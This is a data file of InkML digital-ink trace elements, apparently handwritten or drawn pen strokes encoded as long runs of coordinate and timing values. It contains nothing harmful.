1,0 1-1,0-1 0,0 0 0,0 0 1,-1 0-1,1 0 0,0 0 0,0 1 1,0-1-1,0 0 0,0 0 1,0 0-1,-1 0 0,1 1 0,0-1 1,0 0-1,0 0 0,0 0 0,0 1 1,0-1-1,0 0 0,0 0 0,0 0 1,0 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7:42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0 745 24575,'4'12'0,"0"0"0,1 0 0,0 0 0,1 0 0,11 16 0,41 49 0,-56-75 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,1 1 0,-1-1 0,0 1 0,1-1 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0-1 0,-1 1 0,1-1 0,0 1 0,3-1 0,0-1 0,0 0 0,-1 0 0,1-1 0,-1 0 0,1 0 0,-1 0 0,0-1 0,9-5 0,233-148 0,-6-11 0,286-257 0,-347 278-1365,-154 124-5461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8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8:21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9:21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24575,'6'7'0,"-1"-1"0,0 1 0,8 13 0,11 16 0,22 15 0,2-2 0,58 47 0,117 75 0,-123-97 0,6 20 0,-37-29 0,-10-16-1365,-8-6-5461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19:22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601 0 24575,'-3'2'0,"0"0"0,0 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 1 0,0-1 0,0 1 0,0-1 0,-2 5 0,-1-1 0,-96 133 0,48-64 0,-3-2 0,-99 100 0,137-156 0,-112 99 0,122-109 11,1 0-1,1 0 0,-12 16 0,5-7-1416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37:09.9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1 838 24575,'0'-5'0,"0"-1"0,1 1 0,0-1 0,1 1 0,-1 0 0,1-1 0,0 1 0,0 0 0,4-7 0,31-42 0,-15 23 0,-20 28 0,1 1 0,-1-1 0,0 1 0,1-1 0,0 1 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 1 0,0-1 0,1 1 0,-1 0 0,0 0 0,0 0 0,1 0 0,6-1 0,5 1 0,1 1 0,28 2 0,-9-1 0,872-1 0,-885-1 0,1-2 0,-1 0 0,37-11 0,-9 2 0,-42 9 0,0 1 0,-1-1 0,1 0 0,-1-1 0,1 0 0,10-7 0,36-33 0,-44 33 0,0 1 0,-1-2 0,0 0 0,-1 0 0,7-14 0,2-3 0,13-19 0,-1-2 0,-3-1 0,-3-1 0,-1-1 0,24-95 0,-40 108 0,-6 40 0,-1 22 0,-1 66 0,4 166 0,0-244 0,-1 0 0,2 0 0,-1 0 0,1 0 0,1 0 0,0-1 0,0 0 0,1 1 0,0-2 0,0 1 0,1 0 0,0-1 0,1 0 0,0-1 0,0 0 0,1 0 0,-1 0 0,2-1 0,-1 0 0,1 0 0,-1-1 0,2 0 0,12 4 0,50 18 0,51 17 0,-100-38 0,0 0 0,0-2 0,40 2 0,13-1 0,47 0 0,-102-5 0,-3-1 0,-1 1 0,1 0 0,0 2 0,-1 0 0,30 8 0,-15 2 0,-12-5 0,36 8 0,-51-14 0,0 1 0,0-1 0,0 1 0,0 0 0,0 0 0,-1 0 0,1 1 0,-1-1 0,7 6 0,-3 0 0,0-1 0,0 1 0,10 15 0,5 1 0,-20-22 0,0 1 0,-1-1 0,1 0 0,-1 1 0,1-1 0,-1 1 0,0-1 0,0 1 0,-1 0 0,1 0 0,0 0 0,-1 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 1 0,0 3 0,-1 15-1365,-1-12-5461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20:37:19.2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68 24575,'0'-1'0,"-1"0"0,1 0 0,-1 0 0,1 1 0,-1-1 0,0 0 0,1 1 0,-1-1 0,0 1 0,0-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,0 1 0,0 0 0,0-1 0,-1 1 0,-19-6 0,13 4 0,0 0 0,0 0 0,-1 1 0,1 1 0,0-1 0,0 1 0,0 1 0,0-1 0,0 1 0,-13 4 0,19-4 0,0 0 0,0 0 0,1 1 0,-1-1 0,0 1 0,1-1 0,0 1 0,-1 0 0,1 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 1 0,1-1 0,-1 0 0,1 0 0,-1 4 0,0 50 0,1-49 0,0 11 0,-1-13 0,1 1 0,0-1 0,0 1 0,1-1 0,-1 1 0,1-1 0,0 0 0,1 1 0,-1-1 0,1 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,7 8 0,0-2 0,1-1 0,0-1 0,0 1 0,0-2 0,24 16 0,-30-22 0,0 0 0,1 0 0,-1 0 0,1 0 0,0-1 0,-1 1 0,1-1 0,0-1 0,0 1 0,0-1 0,-1 1 0,1-1 0,0-1 0,0 1 0,0-1 0,0 1 0,-1-2 0,1 1 0,0 0 0,5-3 0,0-1 0,0 1 0,0-1 0,-1-1 0,0 0 0,11-9 0,-17 13 0,0-1 0,-1 0 0,1 0 0,-1 0 0,0 0 0,0-1 0,0 1 0,0-1 0,-1 1 0,1-1 0,-1 1 0,0-1 0,0 0 0,0 0 0,-1 0 0,1 1 0,-1-1 0,0-5 0,0-25 0,1 20 0,-1 0 0,0 0 0,-1 0 0,-1 0 0,-3-14 0,4 25 0,0 1 0,-1-1 0,1 0 0,-1 0 0,1 1 0,-1-1 0,0 1 0,0-1 0,0 1 0,0 0 0,0 0 0,-1 0 0,1 0 0,-5-2 0,-3-2 0,0 1 0,-18-7 0,18 9 0,1-1 0,0 0 0,-10-7 0,16 9-114,0 1 1,0-1-1,0 0 0,-1 1 0,1-1 1,0 1-1,-1 0 0,1 0 0,-1 1 1,1-1-1,-5 0 0,-1 1-6712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24575,'0'302'0,"9"-359"0,-2 25 0,-4 6 0,-1-46 0,0 1 0,-2 69 0,1 1 0,0-1 0,0 0 0,-1 1 0,1-1 0,0 1 0,0-1 0,0 1 0,1 0 0,-1-1 0,0 1 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 1 0,2-2 0,38-10 0,-42 12 0,11-2-151,0 0-1,1 1 0,-1 0 0,0 1 1,1 0-1,-1 1 0,0 0 1,13 4-1,-14-3-6674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24575,'0'746'-1365,"0"-728"-5461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2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24575,'292'-238'0,"-272"224"-682,37-21-1,-43 28-6143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24575,'4'1'0,"-1"0"0,0 0 0,0 0 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 1 0,2 2 0,5 3 0,23 18 0,0 1 0,-2 2 0,49 57 0,-55-44 0,-21-33 0,0-1 0,1 0 0,12 15 0,14 17-1365,-23-27-5461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24575,'-4'0'0,"-1"0"0,1 0 0,0 0 0,0 1 0,0-1 0,0 1 0,0 0 0,0 1 0,1-1 0,-1 1 0,0-1 0,0 1 0,1 0 0,-1 0 0,1 1 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,1 0 0,0 0 0,-4 8 0,-22 31 0,-54 93 0,70-113 0,6-11 0,0 0 0,1 0 0,0 1 0,1 0 0,0 0 0,-2 15 0,5-22 0,0-1 0,1 1 0,0-1 0,0 1 0,0 0 0,0-1 0,1 1 0,0-1 0,0 1 0,0-1 0,0 1 0,1-1 0,0 0 0,0 0 0,4 6 0,-4-7 0,0 0 0,1 0 0,0 0 0,-1-1 0,1 1 0,0-1 0,0 0 0,0 0 0,1 0 0,-1-1 0,0 1 0,1-1 0,-1 1 0,1-1 0,0 0 0,-1-1 0,1 1 0,0 0 0,5-1 0,1 1 85,1 1 1,-1 0-1,12 3 0,-11-2-654,-1 0 1,20 2-1,-19-5-6257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3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598 329 24575,'0'-3'0,"-1"0"0,1 0 0,-1 1 0,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,-1 1 0,1-1 0,-1 1 0,-2-3 0,-27-30 0,19 23 0,6 5 0,-180-181 0,179 182 0,-1 1 0,1-1 0,-1 2 0,0-1 0,-1 1 0,1 1 0,-1-1 0,1 1 0,-1 1 0,0-1 0,0 2 0,0-1 0,0 1 0,-1 1 0,-16 0 0,22 1 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 1 0,1-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,1 1 0,-4 3 0,-32 40 0,25-29 0,6-8 0,1 0 0,0 0 0,0 0 0,1 1 0,0 0 0,1 0 0,0 1 0,0-1 0,-3 20 0,-7 19 0,10-37 0,0 1 0,1 0 0,-3 22 0,2 271 0,6-164 0,-1-74 179,1-18-694,-3-1 1,-7 51-1,6-88-6311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4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 24575,'3'0'0,"1"0"0,-1 0 0,0 0 0,0 1 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,4 4 0,-2-1 0,0 1 0,0 1 0,0-1 0,6 10 0,-3-5 0,34 40 0,-26-33 0,23 35 0,-34-44 0,-1 0 0,0 0 0,0 0 0,-1 1 0,1 0 0,-2-1 0,0 1 0,2 10 0,0 19 0,-2 0 0,-5 70 0,2-105 0,0 1 0,0 0 0,0-1 0,0 1 0,-1-1 0,1 1 0,-1-1 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0-1 0,-6 3 0,0 0 0,1 0 0,-1-1 0,0 0 0,0-1 0,0 0 0,0 0 0,-17 0 0,-67-3-1365,71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6.6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24575,'0'2'0,"0"2"0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2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24575,'0'2'0,"0"2"0,0 3 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1">0 110 24575,'0'2'0,"0"2"0,0 3 0,0 3 0,4 8 0,1 5 0,-1-3-8191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24575,'0'4'0,"0"3"0,0 2 0,0 1 0,0 2 0,0-1 0,0 1 0,0-3-8191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7.9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24575,'0'245'-1365,"0"-224"-5461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2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24575,'0'2'0,"0"2"0,2 3 0,0 2 0,1 1 0,-2 2 0,1 2 0,-1-1 0,-1 1 0,0-4-8191</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1">33 186 24575,'0'2'0,"0"2"0,0 2 0,0 5 0,0 3 0,0 0-8191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24575,'0'2'0,"0"2"0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1">0 66 24575,'0'1'0,"0"4"0,0 1 0,0 3 0,0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8.9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24575,'0'2'0,"0"5"0,0 2 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1">0 88 24575,'2'0'0,"1"2"0,-1 2 0,0 3 0,1 1 0,3 4 0,-1 1 0,1-1 0,0 1 0,-2-1 0,-1-1-8191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2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24575,'2'2'0,"1"2"0,1 1 0,0 1 0,2-1 0,-1 2 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="0.97">55 121 24575,'0'1'0,"0"4"0,0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4.2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 24575,'6'0'0,"3"0"0,4 0 0,2 0 0,0 0 0,-1 0 0,3 0 0,5 0 0,8 0 0,8-4 0,8-1 0,2 1 0,-4 0 0,-7 1 0,-10 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  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1">22 11 24575,'3'4'0,"10"8"0,11 7 0,7 4 0,0 0 0,-5-5-8191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49.9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24575,'2'2'0,"3"0"0,3 2 0,5 4 0,4 3 0,2 2 0,0 0 0,-1-1 0,2 2 0,-3-2-8191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2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24575,'2'0'0,"2"0"0,3 2 0,3 2 0,6 3 0,1 0-8191</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1">393 77 24575,'1'0'0,"4"0"0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6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24575,'2'0'0,"4"2"0,3 1 0,6 3 0,5 0 0,4 0 0,-1-1 0,-1-2 0,-2-1 0,-4-1-8191</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1">273 33 24575,'2'0'0,"3"0"0,7 5 0,6 3 0,1 1 0,0-1 0,-2-2 0,-4-2-8191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0.9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24575,'4'4'0,"8"3"0,7 0 0,-1-1-8191</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1">175 45 24575,'2'0'0,"2"0"0,8 0 0,12 2 0,12 0 0,0 1-8191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24575,'2'0'0,"2"0"0,3 0 0,1 0 0,4 0 0,7 1 0,9 4 0,16-1 0,-1 1-8191</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1">524 22 24575,'2'0'0,"3"0"0,1 0 0,5 0 0,1 0 0,5 0 0,-1 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24575,'9'0'0,"5"0"0,2 0 0,2 0 0,4 0 0,7 2 0,17 4 0,12 2 0,-4-2-8191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1.9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24575,'2'0'0,"4"0"0,3 0 0,4 0 0,3 0 0,1 0 0,-1 0 0,1 0 0,1 0 0,-2 0-8191</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1">284 0 24575,'3'0'0,"6"0"0,2 0 0,6 0 0,1 0 0,0 0 0,0 0 0,1 0 0,0 0 0,2 0 0,2 0 0,-2 0-8191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2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24575,'2'0'0,"2"0"0,3 0 0,1 0 0,4 0 0,3 0 0,-1 0-8191</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1">317 5 24575,'4'0'0,"4"0"0,4 0 0,3 0 0,2 0 0,3 0 0,1 0 0,8 0 0,11 0 0,16 0 0,11-2 0,-7 0-8191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6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24575,'4'0'0,"5"0"0,2 0 0,2 0 0,0 0 0,2 0 0,3 0 0,2 0 0,1 0 0,8 0 0,-2 0-8191</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1">534 0 24575,'2'0'0,"3"0"0,1 0 0,3 0 0,1 0 0,0 0 0,2 0 0,3 0 0,8 0 0,12 0 0,2 0 0,-6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6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 68 24575,'0'-1'0,"-1"0"0,1 0 0,-1 0 0,1 1 0,-1-1 0,0 0 0,1 1 0,-1-1 0,0 1 0,0-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,0 1 0,0 0 0,0-1 0,-1 1 0,-19-6 0,13 4 0,0 0 0,0 0 0,-1 1 0,1 1 0,0-1 0,0 1 0,0 1 0,0-1 0,0 1 0,-13 4 0,19-4 0,0 0 0,0 0 0,1 1 0,-1-1 0,0 1 0,1-1 0,0 1 0,-1 0 0,1 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 1 0,1-1 0,-1 0 0,1 0 0,-1 4 0,0 50 0,1-49 0,0 11 0,-1-13 0,1 1 0,0-1 0,0 1 0,1-1 0,-1 1 0,1-1 0,0 0 0,1 1 0,-1-1 0,1 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,7 8 0,0-2 0,1-1 0,0-1 0,0 1 0,0-2 0,24 16 0,-30-22 0,0 0 0,1 0 0,-1 0 0,1 0 0,0-1 0,-1 1 0,1-1 0,0-1 0,0 1 0,0-1 0,-1 1 0,1-1 0,0-1 0,0 1 0,0-1 0,0 1 0,-1-2 0,1 1 0,0 0 0,5-3 0,0-1 0,0 1 0,0-1 0,-1-1 0,0 0 0,11-9 0,-17 13 0,0-1 0,-1 0 0,1 0 0,-1 0 0,0 0 0,0-1 0,0 1 0,0-1 0,-1 1 0,1-1 0,-1 1 0,0-1 0,0 0 0,0 0 0,-1 0 0,1 1 0,-1-1 0,0-5 0,0-25 0,1 20 0,-1 0 0,0 0 0,-1 0 0,-1 0 0,-3-14 0,4 25 0,0 1 0,-1-1 0,1 0 0,-1 0 0,1 1 0,-1-1 0,0 1 0,0-1 0,0 1 0,0 0 0,0 0 0,-1 0 0,1 0 0,-5-2 0,-3-2 0,0 1 0,-18-7 0,18 9 0,1-1 0,0 0 0,-10-7 0,16 9-114,0 1 1,0-1-1,0 0 0,-1 1 0,1-1 1,0 1-1,-1 0 0,1 0 0,-1 1 1,1-1-1,-5 0 0,-1 1-6712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2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24575,'2'0'0,"2"0"0,5 0 0,2 0 0,1 0 0,3 0 0,1 0 0,3 0 0,4 0 0,0 0 0,4 0 0,-4 0-8191</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1">643 0 24575,'2'0'0,"3"0"0,3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3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24575,'1'0'0,"4"0"0,1 0 0,3 0 0,5 0 0,7 0 0,11 0 0,5 0 0,0 0 0,-5 0-8191</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1">382 0 24575,'4'0'0,"2"0"0,4 0 0,0 0 0,1 0 0,1 0 0,0 0 0,1 0 0,-1 0-8191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6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24575,'4'0'0,"3"0"0,4 0 0,2 0 0,4 0 0,5 0 0,8 0 0,7 0 0,5 0 0,-3 0-8191</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1">425 0 24575,'2'0'0,"3"0"0,1 0 0,5 0 0,1 0 0,1 0 0,1 0 0,0 0 0,3 0 0,-1 0 0,5 0 0,-1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3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24575,'2'0'0,"4"0"0,3 0 0,2 0 0,3 0 0,2 0 0,5 0 0,-2 0-8191</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1">349 0 24575,'3'0'0,"4"0"0,8 0 0,7 2 0,10 1 0,0-1-8191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3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24575,'4'0'0,"3"0"0,4 0 0,2 0 0,-1 0-8191</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1">327 1 24575,'2'0'0,"3"0"0,1 0 0,3 0 0,1 0 0,1 0 0,5 0 0,7 0 0,-2 0-8191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24575,'2'0'0,"4"0"0,11 0 0,2 0-8191</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1">556 1 24575,'2'0'0,"2"0"0,3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4.9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24575,'4'0'0,"3"0"0,2 0 0,1 0 0,-1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3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24575,'2'0'0,"2"0"0,7 0 0,4 0 0,6 0 0,5 0 0,1 0 0,-4 0-8191</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1">328 0 24575,'13'0'0,"13"0"0,14 2 0,5 1 0,-3-1 0,-8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24575,'2'0'0,"4"0"0,12 0 0,19 0 0,2 0-8191</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1">339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5.9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0 191 24575,'4'-2'0,"1"-2"0,2-3 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1">55 125 24575,'0'-1'0,"0"-4"0,0-2 0,0-3 0,0-10 0,0-7 0,0-2 0,0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8.2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 24575,'0'302'0,"9"-359"0,-2 25 0,-4 6 0,-1-46 0,0 1 0,-2 69 0,1 1 0,0-1 0,0 0 0,-1 1 0,1-1 0,0 1 0,0-1 0,0 1 0,1 0 0,-1-1 0,0 1 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 1 0,2-2 0,38-10 0,-42 12 0,11-2-151,0 0-1,1 1 0,-1 0 0,0 1 1,1 0-1,-1 1 0,0 0 1,13 4-1,-14-3-6674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3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1 250 24575,'0'-2'0,"0"-2"0,0-3 0,0-1 0,0-2 0,0-3 0,0 0 0,0-3 0,0 0 0,0 3-8191</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1">1 43 24575,'0'-2'0,"0"-4"0,0-3 0,0-4 0,0 1-8191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1 104 24575,'0'-2'0,"0"-2"0,0-3 0,0-1 0,2-4 0,2-3 0,1-3 0,-1-2 0,-1 2-8191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6.9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1 367 24575,'0'-2'0,"0"-2"0,0-3 0,0-3 0,0-2 0,0-3 0,0-3 0,0 3-8191</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1">11 95 24575,'0'-2'0,"0"-2"0,0-3 0,0-2 0,0-1 0,0 0 0,0-3 0,0-1 0,0 0 0,0 3-8191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7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0 102 24575,'0'-2'0,"0"-2"0,0-3 0,2-1 0,0-2 0,1-3 0,-1 0 0,-1-3 0,0 0 0,-1 3-8191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5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0 309 24575,'11'-87'0,"0"-20"-1365,-11 97-5461</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1">32 48 24575,'0'-2'0,"0"-3"0,0-1 0,0-5 0,0-1 0,0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2:01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39 24575,'0'-4'0,"2"-24"0,4 22 0,-5 6 0,0 0 0,-1 0 0,1 0 0,0 1 0,0-1 0,-1 0 0,1 1 0,0-1 0,-1 0 0,1 1 0,-1-1 0,1 1 0,0-1 0,-1 1 0,1-1 0,0 2 0,3 3 0,0 1 0,0 0 0,-1 0 0,1 0 0,4 12 0,6 12 0,25 32 0,-24-41 0,-1 1 0,-1 1 0,-1 0 0,-1 1 0,15 44 0,-24-62 0,0 1 0,1-2 0,-1 1 0,1 0 0,1 0 0,-1-1 0,1 0 0,7 9 0,6 9 0,-32-39 0,10 12 0,0-1 0,0 1 0,1-1 0,-5-7 0,6 8 0,-21-34 0,-35-78 0,55 108 0,0 0 0,0 1 0,-11-13 0,11 14 0,-1 0 0,1-1 0,0 1 0,1-1 0,0 1 0,-4-9 0,4 3 0,0 0 0,0 0 0,-2 0 0,1 0 0,-12-20 0,15 31 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1 0 0,0 0 0,0 1 0,0-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,1 1 0,-1-1 0,-2 2 0,-3 2 0,0 0 0,1 1 0,-1 0 0,-7 9 0,-4 3 0,13-13 0,0 0 0,0 0 0,1 0 0,-1 1 0,1-1 0,-4 8 0,4-6 0,-1-1 0,0 1 0,0-1 0,-5 6 0,-70 74 0,41-40 0,26-30 0,0 0 0,-1-1 0,-1 0 0,0-1 0,-16 11 0,26-22-170,0 1-1,1 0 0,-1 0 1,1 0-1,0 1 0,0-1 1,-4 7-1,1-1-6655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19.5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24575,'0'746'-1365,"0"-728"-5461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29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0 294 24575,'292'-238'0,"-272"224"-682,37-21-1,-43 28-6143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0.7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24575,'4'1'0,"-1"0"0,0 0 0,0 0 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 1 0,2 2 0,5 3 0,23 18 0,0 1 0,-2 2 0,49 57 0,-55-44 0,-21-33 0,0-1 0,1 0 0,12 15 0,14 17-1365,-23-27-5461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4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0 24575,'0'976'0,"-9"-832"0,6-116 0,3-23 0,-1 0 0,-1 0 0,1 1 0,-1-1 0,0 0 0,0 0 0,0-1 0,-1 1 0,0 0 0,0-1 0,0 1 0,0-1 0,-1 0 0,-7 7 0,6-7 0,-1 1 0,1-1 0,-1 0 0,0 0 0,0-1 0,0 0 0,-1 0 0,1 0 0,-1-1 0,-12 3 0,-128 29 0,140-33 0,1 1 0,-1-1 0,1 1 0,-1 1 0,1-1 0,0 1 0,-7 4 0,9-5 0,1 1 0,-1 0 0,1 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,1 0 0,0 0 0,-3 6 0,1 1 0,0 0 0,1 0 0,0 0 0,1 0 0,0 0 0,0 15 0,3 72 0,1-39 0,-1-33 0,0-18 0,0 1 0,-1-1 0,-1 1 0,1-1 0,-4 15 0,4-21 0,-1-1 0,0 0 0,1 0 0,-1 0 0,0 0 0,1-1 0,-1 1 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,-1 0 0,1 0 0,-2 1 0,-31 0 0,24-2 0,-119-1 0,-138 2 0,265 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 1 0,1-1 0,-1 0 0,0 1 0,1-1 0,-1 1 0,0 0 0,1-1 0,-1 1 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 1 0,1-1 0,-2 2 0,3-1 0,-1-1 0,1 1 0,0 0 0,0-1 0,0 1 0,1 0 0,-1-1 0,0 1 0,0-1 0,1 1 0,-1 0 0,1-1 0,0 1 0,-1-1 0,1 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,0 0 0,2 2 0,20 20 0,0 0 0,2-2 0,44 29 0,-13-9 0,-26-16 0,42 46 0,-28-26 0,39 31 0,21 23 0,-89-84 0,0 2 0,0-2 0,1 0 0,32 23 0,-47-38 0,1 1 0,-1-1 0,0 1 0,1-1 0,-1 1 0,1-1 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1-1 0,-1 1 0,1-1 0,-1 1 0,0-1 0,1 1 0,-1-1 0,0 0 0,0 0 0,0 1 0,1-1 0,-1 0 0,1-2 0,4-3 0,0 0 0,0-1 0,7-11 0,-7 10 0,9-15 0,-1 0 0,19-45 0,3-7 0,-28 62 0,1 1 0,1-1 0,0 2 0,12-12 0,-11 12 0,-1 0 0,0 0 0,-1-1 0,12-19 0,-3-1 0,-1-1 0,-1 0 0,-2-2 0,18-66 0,-31 93 0,0 5 0,0 1 0,-1 0 0,1 0 0,-1 0 0,0-1 0,0 1 0,0 0 0,0-4 0,-1 5 0,1 0 0,0 1 0,-1-1 0,1 0 0,-1 0 0,1 1 0,-1-1 0,0 0 0,1 1 0,-1-1 0,0 1 0,1-1 0,-1 0 0,0 1 0,0 0 0,1-1 0,-1 1 0,0-1 0,0 1 0,0 0 0,0 0 0,1-1 0,-1 1 0,0 0 0,0 0 0,-1 0 0,-74-7 0,-102 3 0,145 4 0,-204 0-1365,227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5:09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24575,'1'4'0,"0"0"0,0 1 0,1-1 0,0 0 0,-1 0 0,1 0 0,0 0 0,1 0 0,3 4 0,1 5 0,25 40 0,49 61 0,-36-52 0,-30-40 0,-9-14 0,-1 1 0,2-1 0,-1 0 0,1 0 0,15 12 0,3-2 0,1-2 0,0 0 0,37 15 0,-46-24 0,0 2 0,-1 0 0,0 1 0,15 12 0,-24-16 0,0 0 0,0 1 0,-1-1 0,0 2 0,0-1 0,-1 1 0,0-1 0,0 1 0,6 16 0,-11-25 0,-1-1 0,1 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,1 0 0,-1 1 0,1-1 0,-1 0 0,1 0 0,0 1 0,1-3 0,18-32 0,-4 7 0,-8 12 0,1 0 0,1 0 0,12-16 0,-17 26 0,1 0 0,0 0 0,0 1 0,1 0 0,0 0 0,0 0 0,0 1 0,15-8 0,7-6 0,-24 15 0,0 1 0,0-1 0,0 1 0,0 0 0,7-2 0,-4 2 0,-2 0 0,1-1 0,0 1 0,0-1 0,-1-1 0,0 1 0,0-1 0,0 0 0,-1 0 0,1-1 0,-1 0 0,-1 0 0,1 0 0,-1 0 0,0-1 0,0 1 0,-1-1 0,0 0 0,0 0 0,3-15 0,-6 19 0,4-15 0,-1-1 0,-1 0 0,-1 0 0,0 0 0,-3-25 0,1 43 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1-1 0,-1 1 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 1 0,-1-1 0,1 1 0,0-1 0,0 1 0,0-1 0,0 1 0,-1-1 0,1 1 0,-2 0 0,-38-4 0,30 3 0,-68-3 0,0 3 0,-119 13 0,82 5 0,76-16 0,-45-3 0,35 0 0,49 2 0,0-1 0,0 1 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,-1-1 0,1 0 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,1 0 0,-1-1 0,0 1 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 1 0,0 0 0,1 0 0,0 0 0,0 0 0,1 0 0,-1-1 0,0 1 0,1 0 0,-1 0 0,1-1 0,-1 1 0,1 0 0,0-1 0,0 1 0,-1 0 0,1-1 0,0 1 0,1-1 0,-1 1 0,2 1 0,80 75 0,-16-16 0,-2 19 0,24-4 0,-85-73 0,0-1 0,1 0 0,-1 0 0,1 0 0,5 2 0,18 15 0,-27-19 0,0-1 0,0 1 0,0 0 0,1 0 0,-1 0 0,0-1 0,0 1 0,0 0 0,0-1 0,1 1 0,-1-1 0,0 0 0,1 1 0,-1-1 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,3 0 0,-1-1 0,-1 0 0,1 0 0,0-1 0,-1 1 0,1 0 0,-1-1 0,1 0 0,-1 1 0,4-5 0,1-1 0,0-1 0,0-1 0,-1 1 0,8-15 0,-3 5 0,-1-1 0,-1 0 0,-1 0 0,-1-1 0,9-33 0,-15 49 0,1 0 0,0 0 0,-1 0 0,2 0 0,-1 1 0,0-1 0,1 1 0,0-1 0,-1 1 0,1 0 0,1 0 0,-1 0 0,0 1 0,1-1 0,4-2 0,-3 2 0,0-1 0,-1 1 0,0-1 0,1 0 0,-1 0 0,-1 0 0,6-7 0,-9 10 0,0 1 0,1 0 0,-1-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,1 1 0,-1-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0-1 0,-1 1 0,1 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,-1 0 0,1-1 0,0 1 0,0 0 0,-1-1 0,-13-4 0,-23 4 0,32 1 0,-91 2 0,-188-2 0,260 0 0,35 5 0,23 10 0,192 117 0,-225-132 0,0 0 0,0 0 0,-1 1 0,1-1 0,0 0 0,-1 1 0,1-1 0,0 1 0,-1-1 0,1 1 0,-1-1 0,1 1 0,-1 0 0,1-1 0,-1 1 0,1-1 0,-1 1 0,1 0 0,-1-1 0,0 1 0,0 0 0,1 0 0,-1-1 0,0 1 0,0 1 0,0-1 0,0 0 0,-1 0 0,1-1 0,-1 1 0,0 0 0,1-1 0,-1 1 0,1-1 0,-1 1 0,0-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,0 0 0,1 1 0,-1-1 0,-2 1 0,-4 1 0,0-1 0,0 1 0,0-1 0,-11 0 0,6-2 0,-1 0 0,1-1 0,0 